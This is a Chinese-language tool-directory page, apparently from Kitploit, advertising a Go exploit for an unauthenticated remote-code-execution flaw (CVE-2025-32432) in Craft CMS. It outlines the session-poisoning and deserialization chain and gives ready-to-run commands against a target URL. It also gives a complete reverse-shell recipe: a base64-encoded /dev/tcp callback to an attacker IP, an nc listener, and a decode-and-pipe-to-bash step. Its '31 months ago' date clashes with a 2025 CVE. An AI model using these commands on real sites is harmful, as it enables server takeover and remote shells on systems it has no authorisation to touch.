Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/heltonpojo/cve-2025-32432
身份验证与授权Payload生成漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubheltonpojo/cve-2025-32432

CVE-2025-32432

适用于 Craft CMS 的 Go 语言预认证 RCE 漏洞利用程序。获取会话/CSRF 令牌,污染 PHP 会话,触发反序列化以实现命令执行或反弹 shell。

查看仓库
31个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-32432 — Craft CMS Pre-Auth RCE

用于在 Craft CMS 上实现未授权远程代码执行(RCE)的 Exploit,使用 Go 编写。
灵感来源于 c0gnit00 的原创工作。

工作原理

  1. 通过 GET /admin/login 获取 PHP 会话和 CSRF token
  2. 通过在查询字符串中注入 PHP 代码来污染 PHP 会话文件
  3. 通过 assets/generate-transform 触发反序列化,以包含并执行被污染的文件

使用方法

root@kitploit:~
go run main.go -u <url> -c <comando> 
Flag描述必需
-u目标 URL(例如:http://target.com)是
-c要执行的命令(例如:id、whoami)是

示例

root@kitploit:~
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami

反弹 Shell

1. 使用你的 IP 和端口生成 base64 payload:

root@kitploit:~
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64

2. 开启监听:

root@kitploit:~
nc -lvnp 4444

3. 使用 payload 运行 exploit:

root@kitploit:~
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"

请将 base64 值替换为第 1 步中使用你的真实 IP 生成的内容。

警告

仅供在授权环境和受控安全测试中使用。

下载工具